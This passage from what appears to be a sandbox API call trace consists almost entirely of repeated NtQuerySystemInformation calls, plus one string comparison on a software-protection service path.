Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x28, ResultLength=0x0) [0206.830] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0206.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x28, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x20, ResultLength=0x0) [0206.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x28, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x20, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x28, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd500, Length=0x20, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd500, Length=0x20, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, 